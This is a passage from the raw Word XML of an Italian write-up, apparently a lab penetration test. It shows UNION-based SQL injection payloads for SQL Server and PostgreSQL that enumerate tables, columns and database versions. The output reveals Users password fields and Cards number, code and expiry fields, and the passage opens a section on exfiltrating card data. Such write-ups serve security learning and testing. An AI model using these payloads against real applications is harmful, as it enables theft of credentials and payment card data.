        <w:t xml:space="preserve">, time, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>timestamp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (considerando anche i </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) e così via andando a considerare anche le diverse tipologie di campo per ogni tipo di database. Alla fine, </w:t>
      </w:r>
      <w:r w:rsidR="00106922">
        <w:t>siamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> riuscit</w:t>
      </w:r>
      <w:r w:rsidR="00106922">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a ottenere i dati da entrambi i database con le seguenti query.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4BB2E3AC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17A27927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4F0E99E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 UNION ALL SELECT s.name, null, '2001-01-01', 1, t.name</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E32C007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sys.tables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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BFDC493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sys.schemas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s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--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="516B3B4E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19CEFB93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###PostgreSQL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="349600E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 UNION ALL SELECT null, null, null, null, s.name, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79ACA6B4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'2001-01-01', t.name</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F8447F7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information_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schema.tables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40C9C33F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WHERE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17540CC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NOT IN ('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information_schema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', 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pg_catalog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') </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E79D27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AND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table_type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'BASE TABLE'--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="728B8886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6E017B7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###Output SQL Server</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="a5"/>
              <w:tblW w:w="87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30"/>
              <w:gridCol w:w="2930"/>
              <w:gridCol w:w="2930"/>
            </w:tblGrid>
            <w:tr w:rsidR="006766AD" w:rsidRPr="00096BC5" w14:paraId="36609F16" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="49EA1E3B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</w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="35969879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6D642808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</w:tr>
            <w:tr w:rsidR="006766AD" w:rsidRPr="00096BC5" w14:paraId="566700D4" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="33C3E34A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</w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="7CF34E9E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1D1C0135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</w:tr>
          </w:tbl>
          <w:p w14:paraId="4897B628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7F34010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###Output PostgreSQL</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="a6"/>
              <w:tblW w:w="87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30"/>
              <w:gridCol w:w="2930"/>
              <w:gridCol w:w="2930"/>
            </w:tblGrid>
            <w:tr w:rsidR="006766AD" w14:paraId="727821A7" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="091799D3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</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="6974DCF0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434CC040" w14:textId="23BA8BB1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</w:tr>
            <w:tr w:rsidR="006766AD" w14:paraId="71275576" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="05AFEBAC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</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="48F0DD75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5B6C9F47" w14:textId="1EE8DA12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</w:tr>
          </w:tbl>
          <w:p w14:paraId="0D067493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28D52723" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="006766AD"/>
    <w:p w14:paraId="144B218A" w14:textId="5CED893D" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Qui </w:t>
      </w:r>
      <w:r w:rsidR="00106922">
        <w:t>abbiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scoperto che le tabelle a cui l’applicazione ha accesso sono due. </w:t>
      </w:r>
      <w:r w:rsidR="00106922">
        <w:t>Abbiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> quindi provato a modificare la query precedente per estrarre anche nome e tipologia delle colonne concatenando i valori con un carattere ‘-‘ per ottenere tutte le informazioni in sole due colonne della query.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6721991A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21526AF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71DEA301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 UNION ALL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0520415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SELECT </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4176A641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s.name + '-' + t.name, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FD4DFA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null, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24960EC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'2001-01-01',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BC17F73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1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3943172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c.name + '-' + </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DDAF0E1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Convert(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varchar(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10),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c.max_length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) + '-' +</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3357C1C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fr-FR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fr-FR"/>
              </w:rPr>
              <w:t>Convert</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00096BC5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00096BC5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00096BC5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">10),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fr-FR"/>
              </w:rPr>
              <w:t>c.is_nullable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00096BC5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48B2BC0D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sys.columns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c </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BE50BC1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sys.tables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6D00941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sys.schemas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s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4A3E6AA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sys.types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ty ON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c.user_type_id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ty.user_type_id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--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="578DA3E3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6FD52FE7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###PostgreSQL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="609B9518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 UNION ALL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BB3B46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SELECT </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="481BADFA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NULL, NULL, NULL, NULL, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68EE274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s.nspname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|| '-' ||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t.relname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14:paraId="13650E3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'2001-01-01', </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26DECB11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c.attname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|| '-' || </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C210D6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CAST(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c.attlen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AS VARCHAR) || '-' || </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B0C64DD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CASE WHEN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c.attnotnull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THEN '0' ELSE '1' END</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1586457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pg_attribute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c</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B2364C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pg_class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c.attrelid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t.oid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="77DF21BA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pg_namespace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s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t.relnamespace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s.oid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="461DD62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pg_type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ty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c.atttypid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ty.oid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="01AE751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WHERE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c.attnum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&gt; 0 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CCD8BD4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AND NOT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c.attisdropped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147A138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AND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t.relkind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'r'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A4B951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AND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s.nspname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NOT IN ('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pg_catalog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', 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information_schema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')--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30A31036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7AB1A953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###Output SQL Server</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="a8"/>
              <w:tblW w:w="87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30"/>
              <w:gridCol w:w="2930"/>
              <w:gridCol w:w="2930"/>
            </w:tblGrid>
            <w:tr w:rsidR="005817D1" w:rsidRPr="00096BC5" w14:paraId="5AE41C1B" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="1FE3D273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-Users</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="020D4AF1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5300A5C3" w14:textId="1D9939D6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Username-100-0</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="005817D1" w:rsidRPr="00096BC5" w14:paraId="6583B082" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="3A17C77E" w14:textId="33495822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-Users</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="3D4CF53B" w14:textId="1FC6E912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4C68A4B6" w14:textId="2CE80D6A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Password-100-0</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="005817D1" w:rsidRPr="00096BC5" w14:paraId="1412820A" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="7C1728B9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-Users</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="1F823725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618A5CAF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FirstName-100-0</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="005817D1" w:rsidRPr="00096BC5" w14:paraId="6EEF6C39" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="251372A8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-Users</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="76225345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1DE17FC5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LastName-100-0</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="005817D1" w:rsidRPr="00096BC5" w14:paraId="02EC4C0A" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="7217C7BB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-Cards</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="1556490C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2A3D0B6E" w14:textId="6B206D32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</w:t>
                  </w:r>
                  <w:r w:rsidR="00A23EB8">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>name</w:t>
                  </w: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</w:t>
                  </w:r>
                  <w:r w:rsidR="00A23EB8">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>100</w:t>
                  </w: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-0</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="005817D1" w:rsidRPr="00096BC5" w14:paraId="4D740F56" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="3E2DBD47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-Cards</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="7BC3159F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06217AE3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Number-16-0</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="005817D1" w:rsidRPr="00096BC5" w14:paraId="37EFD5F7" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="787D2AE8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-Cards</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="74E41039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6C4F43FB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Code-3-0</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="005817D1" w:rsidRPr="00096BC5" w14:paraId="5CA568E9" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="06F04039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-Cards</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="49DC75DE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29A2911A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ExpiryDate-3-0</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="005817D1" w:rsidRPr="00096BC5" w14:paraId="2D4D39B1" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="50B6A403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dbo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-Cards</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="09BEDA1D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2001-01-01</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2930" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="79C247E6" w14:textId="77777777" w:rsidR="005817D1" w:rsidRPr="00096BC5" w:rsidRDefault="005817D1" w:rsidP="005817D1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Issuer-50-0</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="06AB0DF3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6B42E42A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###Output PostgreSQL</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="a9"/>
              <w:tblW w:w="87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148"/>
              <w:gridCol w:w="2409"/>
              <w:gridCol w:w="3233"/>
            </w:tblGrid>
            <w:tr w:rsidR="006766AD" w14:paraId="77AA5893" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3148" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="003804A4" w14:textId="7C086AB1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  <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2409" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="0016B1EB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01B4298B" w14:textId="3B620B04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Username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4FBF1C6C" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3148" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="5D1507DC" w14:textId="3F397ECA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  <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2409" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="0ADB6ADA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1E9EDE33" w14:textId="3B4D7CC9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Password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6F2C8432" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3148" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="71B24987" w14:textId="41E5B0E1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  <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2409" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="5FBBA844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3D332C05" w14:textId="26B8F533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FirstName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02D379C6" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3148" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="19D85DD7" w14:textId="1212670A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Users</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2409" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="1C94B555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0FFD4883" w14:textId="20A378A0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LastName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28BC58A1" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3148" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="05F34C8B" w14:textId="2CF4A38C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  <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2409" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="61CC1908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6DE94300" w14:textId="3A575676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Username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0E360892" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3148" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="5CA0D541" w14:textId="1A439048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  <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2409" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="2122045E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310E5740" w14:textId="439CB985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Number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-1-0</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="006766AD" w14:paraId="7829E421" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3148" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="49F3861B" w14:textId="14B7D8DE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  <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2409" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="1E6C9513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469FB685" w14:textId="7D324419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Code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-4-0</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="006766AD" w14:paraId="6A75E03A" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3148" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="7A21C1B1" w14:textId="071C9220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  <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2409" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="7C109F4E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24BC64DB" w14:textId="55EE0429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ExpiryDate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-4-0</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="006766AD" w14:paraId="6ECDE177" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3148" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="4727F387" w14:textId="0C34AB98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public-</w:t>
                  </w:r>
                  <w:r w:rsidR="009A3E78" w:rsidRPr="00096BC5">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Cards</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2409" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="62B64F71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  <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3233" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="0712943F" w14:textId="00544184" w:rsidR="006766AD" w:rsidRDefault="009A3E78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Issuer</w:t>
                  </w:r>
                  <w:r w:rsidR="00000000">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                    </w:rPr>
                    <w:t>--1-0</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="6B4F955A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5BCEBB54" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="006766AD"/>
    <w:p w14:paraId="24F55E02" w14:textId="2A0417B4" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">L’ultima informazione utile da recuperare è la versione del database. Per questo </w:t>
      </w:r>
      <w:r w:rsidR="008D7437">
        <w:t>abbiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> iniettato il seguente comando.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a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66F22EFA" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74243A0E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2CD4284B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 UNION ALL SELECT @@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version,null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,'2001-01-02',1,''--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="621A8CCD" w14:textId="77777777" w:rsidR="006766AD" w:rsidRPr="00096BC5" w:rsidRDefault="006766AD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2F988039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###PostgreSQL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="087BC5D4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' UNION ALL SELECT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null,null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,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null,null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,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version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),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F61158F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'2001-01-02',''--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A84C3A0" w14:textId="77777777" w:rsidR="006766AD" w:rsidRPr="00096BC5" w:rsidRDefault="006766AD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="72519F33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###Output SQL Server</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="ab"/>
              <w:tblW w:w="886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05"/>
              <w:gridCol w:w="1756"/>
            </w:tblGrid>
            <w:tr w:rsidR="006766AD" w14:paraId="57213A76" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="7105" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="40554BB5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Microsoft SQL Server 2025 (RTM-CU3) (KB5077896) - 17.0.4025.3 (X64) \n\</w:t>
                  </w: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tFeb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 xml:space="preserve"> 25 2026 20:54:27 \n\</w:t>
                  </w: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tCopyright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 xml:space="preserve"> (C) 2025 Microsoft Corporation\n\</w:t>
                  </w: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tEnterprise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 xml:space="preserve"> Developer Edition (64-bit) on Linux (Ubuntu 24.04.4 LTS) &lt;X64&gt;</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1756" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="2346330D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</w:tr>
          </w:tbl>
          <w:p w14:paraId="30CC984F" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="006766AD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="33FBE791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###Output </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>PostgreSQL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="ac"/>
              <w:tblW w:w="886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05"/>
              <w:gridCol w:w="1756"/>
            </w:tblGrid>
            <w:tr w:rsidR="006766AD" w14:paraId="1EA283A9" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="7105" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="61EF697C" w14:textId="77777777" w:rsidR="006766AD" w:rsidRPr="00096BC5" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr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PostgreSQL 18.0 (Debian 18.0-</w:t>
                  </w:r>
                  <w:proofErr w:type="gram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1.pgdg</w:t>
                  </w:r>
                  <w:proofErr w:type="gram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 xml:space="preserve">13+3) on x86_64-pc-linux-gnu, compiled by </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart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>gcc</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00096BC5">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> (Debian 14.2.0-19) 14.2.0, 64-bit</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1756" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="38AEA2A6" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:jc w:val="left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</w:rPr>
                    <w:t>2001-01-01</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="5BA1BD90" w14:textId="77777777" w:rsidR="006766AD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52D393C6" w14:textId="77777777" w:rsidR="00477548" w:rsidRDefault="00477548"/>
    <w:p w14:paraId="7CEEC7EA" w14:textId="15E95FF2" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Per via della presenza del carattere % nella </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>where</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> originale che andav</w:t>
      </w:r>
      <w:r w:rsidR="00A53DA3">
        <w:t>am</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o a troncare, venivano restituite anche le carte dell’utente. Per recuperare solo i dati della struttura, </w:t>
      </w:r>
      <w:r w:rsidR="00465442">
        <w:t>abbiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> aggiunto alcuni caratteri alfabetici prima dell’apostrofo iniziale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F784DBF" w14:textId="3614B753" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:t>A questo punto avev</w:t>
      </w:r>
      <w:r w:rsidR="00A53DA3">
        <w:t>am</w:t>
      </w:r>
      <w:r>
        <w:t>o tutte le informazioni che mi servivano per provare qualunque tipo di attacco.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754B8E65" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Esfiltrazione dei dati</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA2BC30" w14:textId="15DD6DC5" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">L’esfiltrazione dei dati è stata eseguita nel momento stesso in cui sono riuscito a bypassare </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>la login</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in quanto potev</w:t>
      </w:r>
      <w:r w:rsidR="00A53DA3">
        <w:t>amo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vedere le carte dell’utente. Tuttavia, ero riuscito a ottenere le carte di un solo utente. Avendo a disposizione l’intera struttura del database, potev</w:t>
      </w:r>
      <w:r w:rsidR="00A53DA3">
